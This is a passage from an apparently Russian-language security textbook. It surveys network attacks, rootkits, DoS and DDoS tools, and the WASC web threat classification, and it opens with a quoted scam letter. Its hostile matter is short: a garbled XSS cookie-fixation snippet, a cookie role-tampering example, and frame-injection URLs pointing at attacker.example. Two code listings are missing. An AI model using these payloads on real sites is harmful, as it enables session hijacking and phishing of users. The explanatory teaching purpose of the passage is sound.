После того как мистер Усман получит ваш ответ, к вам на электронный ящик будет отправлена специальная форма заявления, которая понадобится для оговоренных выше транзакций.
«I WILL NOT FAIL TO BRING TO YOUR NOTICE THIS TRANSACTION IS HITCH FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER».
Я обещаю, что все операции по переводу денег займут минимальное количество времени с минимальным для вас риском.
«YOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS
TRUST TO HEAR FROM YOUIMMEDIATELY».
Постарайтесь ответить как можно быстрей.
«YOURS FAITHFULLY MR USMAN KAMAL».
С глубочайшим уважением, мистер Усман Камал.
Согласно статистике в 3 % случаев человек, получивший подобное письмо, уезжает в Африку… навсегда.
Сетевое сканирование портов
Сетевое сканирование портов включает в себя процесс автоматизированного выявления уязвимостей на удаленных системах с последующим захватом последних. В качестве сканеров подобного рода можно привести что нибудь вроде XSpider, Essential Net Tools, Net Bios Scaner и многие другие, активно использующиеся теми, кому это надо (рис. 1.4).
Существуют специализированные системы, упрощающие процесс хакинга до максимума. В качестве горячего примера можно привести так называемые авторутеры (англ. root – дословно «корень», «корневая директория»; подразумевается полный захват системы) – программные комплексы, последовательно сканирующие большое количество машин. Следующим после обнаружения уязвимых систем шагом «захватчика» является процесс захвата системы с установкой специализированного вредоносного ПО (черви, троянские кони и руткиты (root kit), которые, в отличие от остальных, обнаружить в системе практически невозможно; также затруднительно и лечение системы).
Рис. 1.4. Утилита XSpider в действии
Преимущества таких автоматизированных систем очевидны: за считанное время автоматизация позволяет захватчику просканировать сотни тысяч систем.
В качестве горячего примера можно привести краткие описания следующих руткитов (взято с ), как нельзя лучше иллюстрирующих совсем не детские возможности современного вредоносного ПО:
♦ «AFXRootkit 2005 – это Open Source руткит, написанный на Delphi; использует code injection и hooks Windows native API для сокрытия своего процесса, modules, handles, files, ports, registry keys и т. д.»;
♦ «FU Rootkit: FU может прятать процессы, поднимать привилегии процесса, обманывать Windows Event Viewer, так что суды невозможны! И даже прячет драйверы устройств (!). И все это без какого либо взлома».
До недавнего времени обнаружение руткитов представляло довольно сложную с технической точки зрения процедуру, однако сейчас существует достаточное количество спецсредств для обнаружения подобных вредоносных модулей. В качестве примера можно привести «Антивирус Касперского 7.0» (рис. 1.5).
Рис. 1.5. Включение модуля обнаружения руткитов
Сетевые атаки с использованием червей, вирусов, троянских коней
Симптоматика вирусного заражения обычно следующая: заражение исполняемых файлов (EXE, COM), сопровождаемое аномальным поведением при запуске, «чудо форматирование дисков», необратимое подвисание системы и т. п.
Из Сети такое чудо можно получить известным способом – через почтовые прикрепления либо скачав суперускоритель браузера.
Троянские кони, в отличие от вирусов, не характеризуются особо страшной деструктивностью, но от этого менее коварным этот вид программ назвать нельзя. Суть сетевой атаки с использованием троянских коней проста: на машину жертвы любым из известных способов «заливается» программа, которая впоследствии, в зависимости от своей функциональной принадлежности, крадет персональные данные с последующей пересылкой «награбленного» своему хозяину, удаленно управляет системой (так называемый backdoor – бэкдор), выполняет функции прокси сервера (понятно, зачем), участвует в организации DDoS и т. д.
Чтобы лучше представить себе некоторые из возможностей шпионских программ и их роль в организации сетевых атак, будет более чем уместно привести следующее описание (источник ).
«A 311 Death Full (бэкдор) – это новая, продвинутая система удаленного администрирования с множеством возможностей. Рассмотрим основные из них:
♦ после установки программа работает из под системных приложений;
♦ невидимость с момента инсталляции;
♦ невидимость слушающих портов;
♦ полный и совершенный контроль над файловой системой: копирование, переименование, удаление файлов и папок, создание новых папок;
♦ вывод файлов/папок по заданной маске (включая refresh), а также возможность показывать растровые изображения поверх всех окон и проигрывать WAV файлы внутренними средствами сервера (при щелчке правой кнопкой мыши на названии соответствующего файла в меню появится дополнительный раздел), отправлять файлы посредством электронной почты прямо из файл менеджера;
♦ запуск приложений одним щелчком кнопкой мыши, просмотр/изменение атрибутов файлов, управление реестром (в Windows 2000/XP управление с правами SYSTEM, но только после перезагрузки): создание, переименование, удаление ключей и параметров;
♦ перезагрузка/выключение компьютера/выход пользователя;
♦ обнуление содержимого CMOS;
♦ отключение дисковода и отключение/включение монитора». Комментарии, как говорится, излишни.
Описание носит ознакомительный характер. Автор не несет никакой ответственности за использование конкретных приведенных материалов в злонамеренных целях.
Что касается сетевых атак, организованных посредством червей, то тут следует сказать следующее: в основах механизмов распространения червей стоят многочисленные дыры ПО, «новопоявления» которых очень часто сопровождаются созданием нового червя. По логике вещей можно было бы предположить: новая дыра – новый червь. Но не следует забывать про многочисленные модификации компьютерных червяков, которые как раз и являются причиной массовых интернет эпидемий.
Атаки типа «отказ в обслуживании» (DoS) и «распределенный отказ в обслуживании» (DDoS)
На сегодняшний день DDoS атаки являются одними из самых опасных с точки зрения последствий. Посудите сами: крупный обслуживающий банковский сервер, который на некоторое время (пусть даже на полчаса) приостановил свою работу, создает убытки, исчисляемые десятками и даже сотнями тысяч долларов. А каковы будут убытки, если сервер замолчит на сутки?
Данный вид атаки в большинстве случаев не требует сверхусилий со стороны атакующего и поэтому доступен многим из тех, кому это надо.
Чем же принципиально отличаются DoS и DDoS от других сетевых атак? Наверное, тем, что цели таких атак не сводятся к получению тотального доступа к вашей сети или разведыванию какой либо конфиденциальной информации. Нападения подобного рода используются в первую очередь для подрыва нормального функционала системы (это как раз тот случай, когда можно говорить о «нарушении доступности», – см. разд. 1.2) за счет обработки пакетов или траты системных ресурсов. Подобные нападения имеют несколько разновидностей.
UDP flood представляет собой атаку, при которой на определенный адрес системы мишени осуществляется отправка множества пакетов UDP (User Datagram Protocol – дополнительный компонент протокола TCP, поддерживающий выполняющуюся без подключений службу датаграмм, не гарантирующую ни доставку, ни правильную последовательность доставленных пакетов). В настоящее время подобный вид атак применяется все реже: особенностью UDP отправите лей является возможность их легкого обнаружения, что связано с отсутствием шифрования протоколов TCP и UDP на уровне взаимодействия управляющего атакой и машинами зомби.
ICMP flood – атака посредством ICMP протокола (Internet Control Message Protocol – обязательный управляющий протокол в наборе протоколов TCP/IP, сообщающий об ошибках и обеспечивающий связь между узлами сети. Именно протокол ICMP используется программой Ping для обнаружения и устранения неполадок TCP/IP).
Продолжая экскурс по ICMP, более чем уместно упомянуть о так называемой атаке Smurf, представляющей собой пинг запросы ICMP по адресу направленной широковещательной рассылки с использованием в пакетах этого запроса фальшивого адреса источника. В основе Smurf атаки стоит использование Smurf пинг запросов по адресу направленной широковещательной рассылки. Используемый в пакетах этого запроса фальсифицированный адрес источника совпадает с адресом атакуемого. Системы, получившие направленный широковещательный пинг запрос, как им и положено, исправно на него отвечают (естественно, тому, от кого пришел запрос). Результатом такого ответа является затопление атакуемого большим количеством сетевых пакетов, что, в конечном счете, приводит к отказу в обслуживании.
TCP SYN Flood имеет место, в случае если клиент пытается установить TCP со единение с сервером, что требует обмена определенной последовательностью сообщений. Сначала клиентская система посылает SYN пакет на сервер. После этого сервер подтверждает получение SYN пакета, отсылая SYN ACK сообщение клиенту. Затем клиент завершает установку соединения, отвечая сообщением ACK, и затем снова должен произойти обмен данными. В точке, где система сервера послала подтверждение (SYN ACK) назад клиенту, но еще не получила сообщения ACK, устанавливается полуоткрытое соединение. «Фишка» в том, что параметры, касающиеся всех ждущих обработки соединений, располагаются в оперативной памяти сервера, которая не безразмерна, разумеется. Если преднамеренно создать большое количество частично открытых соединений, то память переполнится, и система подвиснет.
Атаки Ping of Death заставляют системы реагировать непредсказуемым образом при получении слишком больших IP пакетов. TCP/IP поддерживает максимальный размер пакета в 65 Кбайт (как минимум 20 байт информации в IP заголовке, некоторое количество дополнительной информации и остальная часть пакета, содержащая основные данные). Атаки Ping of Death могут вызвать крушение, зависание и перезагрузку системы.
Tribe Flood Network (TFN) и Tribe Flood Network 2000 (TFN2K) являются распределенными инструментальными средствами, обычно запускающими скоординированные DoS атаки из многих источников на одну или несколько целей. Использование TFN атаки дает возможность генерировать пакеты с фальшивыми IP адресами источника. Механизм атаки приблизительно таков: злонамеренный пользователь посылает с главного компьютера команды нападения на список TFN серверов или демонов. Затем демоны генерируют указанный тип DoS атаки на один или несколько IP адресов жертв. IP адреса и порты источника атаки могут изменяться совершенно случайным образом, как и размеры пакетов.
Высокая эффективность современных DDoS атак достигается путем модификации и комбинирования отдельных ее видов. Уже упомянутые TFN и TFN2K позволяют одновременно инициировать атаки нескольких типов: Smurf, UDP flood, ICMP flood и TCP SYN flood, – что делает их мощным инструментом для подобных задач. Пересылка команд и параметров при этом умело замаскирована в передаваемых данных, чтобы не вызвать подозрений у защитного ПО.
Как средства организации распределенных атак TFN и TFN2K относительно сложны и требуют от атакующего намного более высокой квалификации, чем в других случаях, но и практическая эффективность их намного выше.
Ярчайшим представителем средств организации DoS атак нового поколения является Stacheldracht (дословно «колючая проволока»). Stacheldraht объединяет в себе особенности некоторых DoS атак, в том числе TFN, шифрование связи между нападающим и главными серверами Stacheldraht и автоматическое обновление агентов. Начальный этап атаки включает активное массированное проникновение в большое количество систем для последующего использования их при атаке. Затем следует заключительный этап, в ходе которого «порабощенные» системы используются для атаки на один или несколько объектов.
Атаки IP spoofing (подмена IP адресов) – это не разновидность DoS, но, тем не менее, атаки подобного рода широко используются, в случае если необходимо скрыть IP, что имеет место при организации любой DDoS.
Атаки MAC spoofing. Применяются для фальсификации MAC адреса. Атака подобного рода проводится тогда, когда необходимо, чтобы машину взломщика приняли за доверенную машину, в случае если доступ закрыт посредством фильтрации MAC адресов. Остановимся на технологии подробнее.
В пределах локальной сети каждая сетевая карта маркируется уникальным MAC адресом – 12 значным шестнадцатеричным числом. Прежде чем отправить пакет в локальную сеть, драйвер сетевой карты определяет по IP адресу точки назначения физический адрес сетевой карты компьютера адресата и помечает пакет соответствующим MAC. На принимающей стороне сетевая карта, получившая пакет со своим MAC адресом, пропускает его, направляя по цепочке «драйвер – операционная система – приложение».
Взаимодействие машин в сети на физическом уровне обслуживается протоколом ARP, который представляет собой протокол из набора протоколов TCP/IP, обеспечивающий сопоставление IP адресов с адресами MAC для пакетов IP. В случае если машина отправляет пакет в пределах подсети, для сопоставления и привязки MAC/IP служит ARP таблица. При отсутствии записей в ARP таблице в ход идут данные ARP кэша. И только в крайнем случае, когда данные нигде не найдены, осуществляется широковещательный ARP запрос по адресу ff:ff:ff:ff:ff:ff (значит, всем).
Особенности протокола ARP таковы, что возможна практически беспрепятственная подмена истинных соответствий в ARP хэше. Для этого может быть использовано специализированное программное обеспечение вроде SMAC или MAC SPOOFER 2006 (рис. 1.6).
Рис. 1.6. Программа MAC SPOOFER в действии
Password attacks (атаки для взлома паролей) могут использовать различные методы: лобовая атака, или Brute Force – так называемый грубый перебор паролей. «Брутфорс» – атаки имеют место в том случае, если существует потенциальная возможность множественных попыток аутентификации: электронные ящики, учетные записи FTP, SAM файлы, PWL файлы, UIN и т. д. В ходе атаки последовательно перебираются все возможные комбинации символов, сочетание которых может оказаться верным. Процесс такого перебора автоматизирован и осуществляется с помощью специализированного программного обеспечения.
Packet sniffers – приложение, которое использует сетевой адаптер в «беспорядочном режиме» (когда сетевой адаптер посылает на обработку все пакеты, физически полученные по сети), чтобы захватить все сетевые пакеты, посланные через определенный домен. Снифферы пакетов используются легально в сетях для анализа трафика и поиска неисправностей. Однако, так как некоторые сетевые приложения посылают данные открытым текстом (telnet, FTP, SMTP, POP3 и т. д.), сниффинг пакетов может предоставить даже критически важную информацию, например имена пользователей и пароли.
1.4. Классификация угроз безопасности веб серверов
Многие из читателей наверняка обратили свое внимание на то, какую важную роль в анализе рисков (см. разд. 1.2) играет такой фактор, как угроза. В этой связи будет более чем уместно ознакомиться с перечнем типичных угроз, которые приведены ниже. Настоящая классификация окажется полезна и подготовленным читателям, и тем, кто углубленно интересуется вопросами компьютерной безопасности.
Очередной раз выходя в Интернет и привычно набирая в браузере дорогой сердцу адрес, мы убеждаемся снова и снова, что не так уж все и плохо: апокалипсис постоянно кто то переносит, а мы живем в мире высоких технологий, и это не может не радовать. Интернет стал для многих из нас настолько привычным, что иногда кто нибудь да и допустит мысль о его существовании со времени сотворения мира. Между тем за кажущейся простотой и удобством стоит четкая и отлаженная работа узлов Сети. Было бы наивно полагать, что все совершенно, особенно если речь идет о вещах, сосуществующих в столь динамичной среде. Просматривая горячие двадцатки SANS, предупреждения EEYE, горячий эксклюзив от SecurityLab, убеждаешься снова и снова: безопасность есть процесс, а не состояние.
В рамках данного раздела мы поговорим с вами о безопасности веб серверов, а точнее постараемся внести ясность и создать некое подобие современной классификации веб угроз. Предпосылки к созданию подобной классификации очевидны. За последние несколько лет индустрия безопасности веб приложений адаптировала немалое количество не совсем точных терминов, описывающих уязвимости. Такие названия уязвимостей, как «подделка параметров» (Parameter Tampering), «меж сайтовое выполнение сценариев» (Cross site Scripting) и «отравление печений» (Cookie Poisoning) (да да, именно так), мягко говоря, не совсем точно определяют суть проблемы и возможные последствия атак. Отсутствие четкости в определениях часто вызывает проблемы и взаимонепонимание, даже если стороны согласны с основной идеей.
Когда начинающий специалист безопасности веб приложений приступает к обучению, его быстро вводит в заблуждение отсутствие стандартного языка. Подобная ситуация не только не способствует профессиональному овладению предметом, но и замедляет понимание картины в целом. Появление классификации угроз безопасности веб приложений является исключительно важным событием в мире IT.
По известным причинам только система знаний, а не ее разрозненный, дискретный вариант, может служить показателем высшей квалификации разработчиков приложений, специалистов в области безопасности, производителей программных продуктов. На основе классификации в дальнейшем могут быть созданы методики обследования приложений, рекомендации по разработке приложений с учетом безопасности, требования к продуктам и службам. Следующая классификация есть результат проработки различных книг, десятков статей и презентаций. У ее истоков стоит Web Application Security Consortium, представители которой создали базу для разработки и популяризации стандартной терминологии описания подобных проблем ().
Представленная классификация окажется полезной прежде всего специалистам, хотя в целом материал направлен на широкий круг читателей, интересующихся проблемами компьютерной безопасности.
Современная классификация имеет иерархическую структуру. Классы атак разбиты по пунктам (1; 2 и т. д.) с соответствующими подпунктами (1); 2) и т. д.). Название класса атаки представлено как в русском варианте, так и в английском.
1. Аутентификация (Authentication):
1) подбор (Brute Force);
2) недостаточная аутентификация (Insufficient Authentication);
3) небезопасное восстановление паролей (Weak Password Recovery Validation).
2. Авторизация (Authorization):
1) предсказуемое значение идентификатора сессии (Credential/Session Prediction);
2) недостаточная авторизация (Insufficient Authorization);
3) отсутствие тайм аута сессии (Insufficient Session Expiration);
4) фиксация сессии (Session Fixation).
3. Атаки на клиентов (Client side Attacks):
1) подмена содержимого (Content Spoofing);
2) межсайтовое выполнение сценариев (Cross site Scripting, XSS);
3) расщепление HTTP запроса (HTTP Response Splitting).
4. Выполнение кода (Command Execution):
1) переполнение буфера (Buffer Overflow);
2) атака на функции форматирования строк (Format String Attack);
3) внедрение операторов LDAP (LDAP Injection);
4) выполнение команд операционной системы (OS Commanding);
5) внедрение операторов SQL (SQL Injection);
6) внедрение серверных расширений (SSI Injection);
7) внедрение операторов XPath (XPath Injection).
5. Разглашение информации (Information Disclosure):
1) индексирование директорий (Directory Indexing);
2) идентификация приложений (Web Server/Application Fingerprinting);
3) утечка информации (Information Leakage);
4) обратный путь в директориях (Path Traversal);
5) предсказуемое расположение ресурсов (Predictable Resource Location).
6. Логические атаки (Logical Attacks):
1) злоупотребление функциональными возможностями (Abuse of Functionality);
2) отказ в обслуживании (Denial of Service);
3) недостаточное противодействие автоматизации (Insufficient Anti automation);
4) недостаточная проверка процесса (Insufficient Process Validation).
Пункт и подчиненные ему подпункты разбиты на разделы. Класс атаки имеет краткое описание и дополняется соответствующим «живым» примером. Ну что ж, начнем по порядку.
Классифицируем атаки, направленные на обход или эксплуатацию уязвимостей в механизмах реализации аутентификации веб серверов.
Подбор (Brute Force). Подбор, или просто «брут», как его ласково любят называть хакеры, представляет собой автоматизированный процесс проб и ошибок, основной задачей которого является угадывание имени пользователя, пароля, номера кредитной карты, ключа шифрования и т. д. Многие системы позволяют использовать слабые пароли или ключи шифрования, и пользователи часто выбирают легко угадываемые или содержащиеся в словарях парольные фразы. Трагизм еще и в том, что пользователи намеренно выбирают простые пароли, так как сложные, помимо времени ввода, неудобны еще и тем, что легко забываются. Воспользовавшись данной ситуацией, злонамеренный пользователь может применить электронный словарь (что чаще всего и делается) и попытаться использовать всю мощь содержащихся в нем комбинаций символов в качестве пароля. Если сгенерированный пароль позволяет получить доступ к системе, атака считается успешной, и атакующий может использовать учетную запись.
Подобная техника проб и ошибок может быть с успехом использована для подбора ключей шифрования. В случае использования сервером ключей недостаточной длины злоумышленник может получить используемый ключ, протестировав все возможные комбинации. Существует два вида подбора: прямой и обратный. При прямом подборе используются различные варианты пароля для одного имени пользователя (например, имя пользователя – Lamer, пароли – fuck, world, qwerty, 123321…). При обратном – перебираются различные имена пользователей, а пароль остается неизменным (например, имена пользователей – User, Intel, Sara, Vaviorka…, пароль – 12345678). В системах с миллионами учетных записей вероятность использования различными пользователями одного пароля довольно высока. Несмотря на популярность и высокую эффективность, подбор может занимать несколько часов, дней или лет. Данный вид атак широко используется преимущественно там, где отсутствует блокировка в случае неверного сочетания, – это может быть простой взлом NTLM хэшей и т. д.
Недостаточная аутентификация (Insufficient Authentication). Данная уязвимость возникает тогда, когда веб сервер позволяет атакующему получать доступ к важной информации или функциям сервера без должной аутентификации. Атаки подобного рода очень часто реализуются посредством интерфейса администрирования через сеть. Чтобы не использовать аутентификацию, некоторые ресурсы по умолчанию «сидят в укромном месте» по определенному адресу, который не указан на основных страницах сервера или других общедоступных ресурсах.
Однако подобный подход не более чем «безопасность через сокрытие». Важно понимать, что несмотря на то что злоумышленник не знает адреса страницы, она все равно доступна через веб. Необходимый URL может быть найден путем перебора типичных файлов и директорий (таких как /admin/) с использованием сообщений об ошибках, журналов перекрестных ссылок или путем простого чтения документации. Подобные ресурсы должны быть защищены адекватно важности их содержимого и функциональных возможностей.
К примеру, многие веб приложения по умолчанию используют для административного доступа ссылку в корневой директории сервера (/admin/). Обычно ссылка на эту страницу не фигурирует в содержимом сервера, однако страница доступна с помощью стандартного браузера. Поскольку пользователь или разработчик предполагает, что никто не воспользуется этой страницей, так как ссылки на нее отсутствуют, зачастую реализацией аутентификации пренебрегают. В результате для получения контроля над сервером злоумышленнику достаточно зайти на эту страницу.
Небезопасное восстановление паролей (Weak Password Recovery Validation).
Данная уязвимость реализуется, благодаря тому что веб сервер позволяет атакующему несанкционированно получать, модифицировать или восстанавливать пароли других пользователей. Часто аутентификация на веб сервере требует от пользователя запоминания пароля или парольной фразы. Строгая политика безопасности предусматривает, что только пользователь должен знать пароль, причем помнить его отчетливо. Но, как оно всегда бывает, со временем пароль забывается. Ситуация усложняется еще и тем, что у многих по несколько электронных ящиков.
Примером реализации подобной функции является использование «секретного вопроса», ответ на который указывается в процессе регистрации. Вопрос либо выбирается из списка, либо вводится самим пользователем. Еще один механизм позволяет пользователю указать «подсказку», которая поможет ему вспомнить пароль. Другие способы требуют от пользователя указать часть персональных данных – таких как номер паспорта, домашний адрес, почтовый индекс и т. д., – которые затем будут использоваться для установления личности. После того как пользователь докажет свою идентичность, система отобразит новый пароль или перешлет его по почте. Система восстановления пароля может быть скомпрометирована путем использования подбора, уязвимостей системы или из за легко угадываемого ответа на секретный вопрос.
Многие серверы требуют от пользователя указать его электронный адрес в комбинации с домашним адресом и номером телефона. Эта информация может быть легко получена из сетевых справочников. В результате данные, используемые для проверки, не являются большим секретом. Кроме того, эта информация может быть получена злоумышленником с использованием других методов – таких как межсайтовое выполнение сценариев или фишинг. Одно из слабых звеньев, несомненно, – парольные подсказки. Сервер, использующий подсказки для облегчения запоминания паролей, может быть атакован, поскольку подсказки помогают в реализации подбора паролей. Пользователь может использовать стойкий пароль, например «27Пуаро10», с соответствующей подсказкой: «детектив». Атакующий может заключить, что пользовательский пароль состоит из даты рождения и имени любимого автора пользователя. Это помогает сформировать относительно короткий словарь для атаки путем перебора.
Многие сайты разрешают доступ к некоторому содержимому или функциям приложения только определенным пользователям. Доступ для других должен быть ограничен. Используя различные техники, злоумышленник может повысить свои привилегии и получить доступ к защищенным ресурсам.
Предсказуемое значение идентификатора сессии (Credential/Session Prediction).
Предсказуемое значение идентификатора сессии позволяет перехватывать сессии других пользователей. Подобные атаки выполняются путем предсказания или угадывания уникального идентификатора сессии пользователя. Эта атака, так же как и перехват сессии (Session Hijacking), в случае успеха позволяет злоумышленнику послать запрос веб серверу с правами скомпрометированного пользователя. Дизайн многих серверов предполагает аутентификацию пользователя при первом обращении и дальнейшее отслеживание его сессии. Для этого пользователь указывает комбинацию имени и пароля. Вместо повторной передачи имени пользователя и пароля при каждой транзакции веб сервер генерирует уникальный идентификатор, который присваивается сессии пользователя. Последующие запросы пользователя к серверу содержат идентификатор сессии как доказательство того, что аутентификация была успешно пройдена. Если атакующий может предсказать или угадать значение идентификатора другого пользователя, это может быть использовано для проведения атаки.
Так, многие серверы генерируют идентификаторы сессии, используя алгоритмы собственной разработки. Подобные алгоритмы могут просто увеличивать значение идентификатора для каждого запроса пользователя. Другой распространенный вариант – использование функции от текущего времени или других специфичных для компьютера данных. Идентификатор сессии сохраняется в cookie, скрытых полях форм или URL. Если атакующий имеет возможность определить алгоритм, используемый для генерации идентификатора сессии, он может выполнить следующие действия:
♦ подключиться к серверу, используя текущий идентификатор сессии;
♦ вычислить или подобрать следующий идентификатор сессии;
♦ присвоить полученное значение идентификатора cookie/скрытому полю формы/URL.
Недостаточная авторизация (Insufficient Authorization). Недостаточная авторизация возникает, когда веб сервер позволяет атакующему получать доступ к важной информации или функциям, доступ к которым должен быть ограничен. Успешное прохождение аутентификации пользователем вовсе не означает, что он должен получить доступ ко всем функциям и содержимому сервера. Кроме аутентификации, должно быть реализовано разграничение доступа. Процедура авторизации определяет, какие действия может совершать пользователь, служба или приложение. Грамотно построенные правила доступа должны ограничивать действия пользователя согласно политике безопасности. Доступ к важным ресурсам сайта должен быть разрешен только администраторам.
В прошлом многие веб серверы сохраняли важные ресурсы в скрытых директориях – таких как /admin или /Log. Если атакующий запрашивал эти ресурсы напрямую, он получал к ним доступ и мог перенастроить сервер, получить доступ к важной информации либо полностью скомпрометировать систему. Некоторые серверы после аутентификации сохраняют в cookie или скрытых полях идентификатор «роли» пользователя в рамках веб приложения. Если разграничение доступа основывается на проверке данного параметра без верификации принадлежности к роли при каждом запросе, злоумышленник может повысить свои привилегии, просто модифицировав значение cookie. К примеру, значение cookie: Session Role = User заменяется на SessionId = 12345678; Role = Admin.
Отсутствие тайм аута сессии (Insufficient Session Expiration). Если для идентификатора сессии или учетных данных не предусмотрен тайм аут или его значение слишком велико, злоумышленник может воспользоваться старыми данными для авторизации. Это повышает уязвимость сервера для атак, связанных с кражей идентификационных данных. Поскольку протокол HTTP не предусматривает контроль сессии, веб серверы обычно используют идентификаторы сессии для определения запросов пользователя. Таким образом, конфиденциальность каждого идентификатора должна быть обеспечена, чтобы предотвратить множественный доступ пользователей с одной учетной записью. Похищенный идентификатор может использоваться для доступа к данным пользователя или осуществления мошеннических транзакций. Отсутствие тайм аута сессии увеличивает вероятность успеха различных атак. К примеру, злоумышленник может получить идентификатор сессии, используя сетевой анализатор или уязвимость типа «межсайтовое выполнение сценариев». Хотя тайм аут не поможет, в случае если идентификатор будет использован немедленно, ограничение времени действия поможет при более поздних попытках использования идентификатора. В другой ситуации, если пользователь получает доступ к серверу с публичного компьютера (библиотека, интернет кафе и т. д.), отсутствие тайм аута сессии может позволить злоумышленнику воспользоваться историей браузера для просмотра страниц пользователя. Большое значение тайм аута увеличивает шансы подбора действующего идентификатора. Кроме того, увеличение этого параметра ведет к увеличению одновременно открытых сессий, что еще больше повышает вероятность успешного подбора.
При использовании публичного компьютера, когда несколько пользователей имеют неограниченный физический доступ к машине, отсутствие тайм аута сессии позволяет злоумышленнику просматривать страницы, посещенные другим пользователем. Если функция выхода из системы просто перенаправляет на основную страницу веб сервера, а не завершает сессию, страницы, посещенные пользователем, могут быть просмотрены злоумышленником. Поскольку идентификатор сессии не был отмечен как недействительный, атакующий получит доступ к страницам сервера без повторной аутентификации.
Фиксация сессии (Session Fixation). Используя данный класс атак, злоумышленник присваивает идентификатору сессии пользователя заданное значение. В зависимости от функциональных возможностей сервера существует несколько способов зафиксировать значение идентификатора сессии. Для этого могут использоваться атаки типа «межсайтовое выполнение сценариев» или подготовка сайта с помощью предварительного HTTP запроса. После фиксации значения идентификатора сессии атакующий ожидает момента, когда пользователь войдет в систему. После входа пользователя злоумышленник использует идентификатор сессии для получения доступа к системе от имени пользователя.
Существуют два механизма управления сессиями на основе идентификаторов. Первый из них – так называемый разрешающий – основан на том, что конкретный идентификатор сессии присваивается браузером. Механизмы второго типа – строгого – функционируют с идентификаторами, сгенерированными сервером. В случае разрешающих механизмов злонамеренный пользователь может выбрать любой идентификатор сессии. При условии отсутствия спецзащиты от фиксации сессии данная атака может быть использована против любого сервера, аутентифицирующего пользователей с помощью идентификатора сессии. Не секрет, что большинство веб серверов сохраняют ID в cookie, но это значение также может присутствовать в URL или скрытом поле формы. К сожалению, системы, использующие cookie, являются наиболее уязвимыми.
Большинство известных в настоящий момент вариантов фиксации сессии направлено именно на значение cookie (кстати, не грех будет напомнить, что сохраненные пароли вашего электронного ящика, входа на персональный сайт и прочие сохраняются все в тех же пресловутых cookie, которые можно найти по адресу: and Settings\Username\Cookies). После описанного выше нетрудно догадаться, каким именно образом программы, предназначенные для шпионажа, похищают ваши конфиденциальные данные.
Рассмотрим подробно атаку, направленную на фиксацию сессии. Атака осуществляется в три этапа. На первом этапе злонамеренный пользователь устанавливает на атакуемом сервере так называемую сессию заглушку и получает (или выбирает произвольный в зависимости от механизма) от него идентификатор. На втором этапе, собственно, и происходит фиксация сессии, когда злоумышленник передает значение идентификатора сессии заглушки браузеру пользователя и фиксирует его идентификатор. Данный пункт реализуется посредством модификации значения cookie с помощью пресловутого XSS.
Следующим шагом атакующего является собственно подключение к сессии. Атакующий ожидает аутентификации пользователя на сервере. После захода пользователя на сайт злоумышленник подключается к серверу, используя зафиксированный идентификатор, и получает доступ к сессии пользователя. Как вы уже поняли, «гвоздем программы» является фиксация ID, которая реализуется посредством следующих действий.
♦ При наличии уязвимости типа «межсайтовое выполнение сценариев» злоумышленник получает возможность установить определенное значение cookie на стороне клиента посредством следующего кода: httр://example/ document.cookie=»sessionid=12 34;%2 0domain=.example.dom»; script> .idc.
♦ Второй вариант предусматривает установку нужного значения cookie с помощью тега META. Кроме того, возможна установка cookie с использованием заголовка HTTP ответа.
Атаки на клиентов
Следующие подпункты являются описанием атак на пользователей веб сервера. Во время посещения сайта между пользователем и сервером устанавливаются доверительные отношения как в технологическом, так и в психологическом аспектах. Говоря простым языком, пользователь ожидает, что сайт предоставит ему легитимное безопасное содержимое. Кроме того, пользователь не ожидает атак со стороны сайта. Эксплуатируя это доверие, злоумышленник может применять различные методы для проведения атак на клиентов сервера.
Подмена содержимого (Content Spoofing). Наверное, многие из читателей встречались с выражением «дефейс сайта». Так вот, дефейс – это грубая подмена содержимого. Однако это не есть самое интересное. В отличие от дефейса, следующий способ подмены не преследует цели обескуражить посетивших сайт нецензурными выражениями. Его задачи другие. Используя определенную технику подмены содержимого, злоумышленник заставляет пользователя поверить, что страницы сгенерированы веб сервером, а не переданы из внешнего источника. Как это происходит?
Некоторые веб страницы создаются с использованием динамических источников HTML кода. К примеру, расположение фрейма может передаваться в следующем параметре URL:
Атакующий может заменить исходное значение параметра framesrc на frame_ src= http://attacker.example/spoof.html.
Когда будет отображаться результирующая страница, в строке адреса браузера пользователя начнет отображаться адрес сервера (foo.example), но на странице также будет присутствовать внешнее содержимое, загруженное с сервера атакующего (attacker.example), замаскированное под легальный контент. Получается довольно оригинальная ситуация. Пользователь может и не подозревать, что вводит секретные данные, становящиеся достоянием того, кто умело подделал оригинальную страницу. Задача злонамеренного пользователя, как вы уже догадались, сводится к тому, чтобы он перенаправился по специально созданной ссылке. Последняя в виде спама может быть прислана по электронной почте, системе моментального обмена сообщениями, опубликована на доске сообщений или открыта в браузере пользователя с применением межсайтового выполнения сценариев. В качестве примера реализации данной атаки с успехом подойдет создание ложного пресс релиза. Предположим, что веб сервер динамически генерирует фреймы на странице с пресс релизами компании. Когда пользователь перейдет по ссылке http://foo.exampLe/pr?pg=http://foo.exampLe/pr/01012003.htmL, в его браузер загрузится страница следующего содержания (листинг 1.7).
Листинг 1.7. Код, перенаправляющий пользователя на подложную страницу
Приложение pr создает страницу с меню и динамически генерируемым значением тега FRAME SRC. Фрейм pr_content отображает страницу, указанную в параметре pg HTTP запроса. Но поскольку атакующий изменил нормальный URL на значениеhttр://foo.example/pr?pg=http://attacker.example/spoofed press_release.html и сервер не проводит проверки параметра pg, результирующий HTML код будет иметь следующий вид (листинг 1.8).
Листинг 1.8. Результирующий HTML код
В результате attacker.example будет выглядеть так, как будто это страница сервера foo.example.
Межсайтовое выполнение сценариев (Cross site Scripting или XSS). Наличие уязвимости Cross site Scripting позволяет атакующему передать серверу исполняемый код, который будет перенаправлен браузеру пользователя. Для написания подобного кода обычно используются HTML/JavaScript, но могут быть применены и VBScript, ActiveX, Java, Flash и др. Переданный код исполняется в контексте безопасности (или зоне безопасности) уязвимого сервера. Используя текущие привилегии, код получает возможность читать, модифицировать или передавать важные данные, доступные с помощью браузера (здесь совсем не грех будет вспомнить, что, если вы работаете с правами администратора, шансов попасться на такой крючок больше). При данном виде атаки у атакованного пользователя может быть скомпрометирована учетная запись (кража cookie), его браузер может быть перенаправлен на другой сервер или осуществлена подмена содержимого сервера. В результате тщательно спланированной атаки злоумышленник может использовать браузер жертвы для просмотра страниц сайта от имени атакуемого пользователя. Передача кода в таких случаях осуществляется через URL, в заголовках HTML запроса (cookie, user agent, refferer), значениях полей форм и т. д. Существует два типа атак, приводящих к межсайтовому выполнению сценариев:
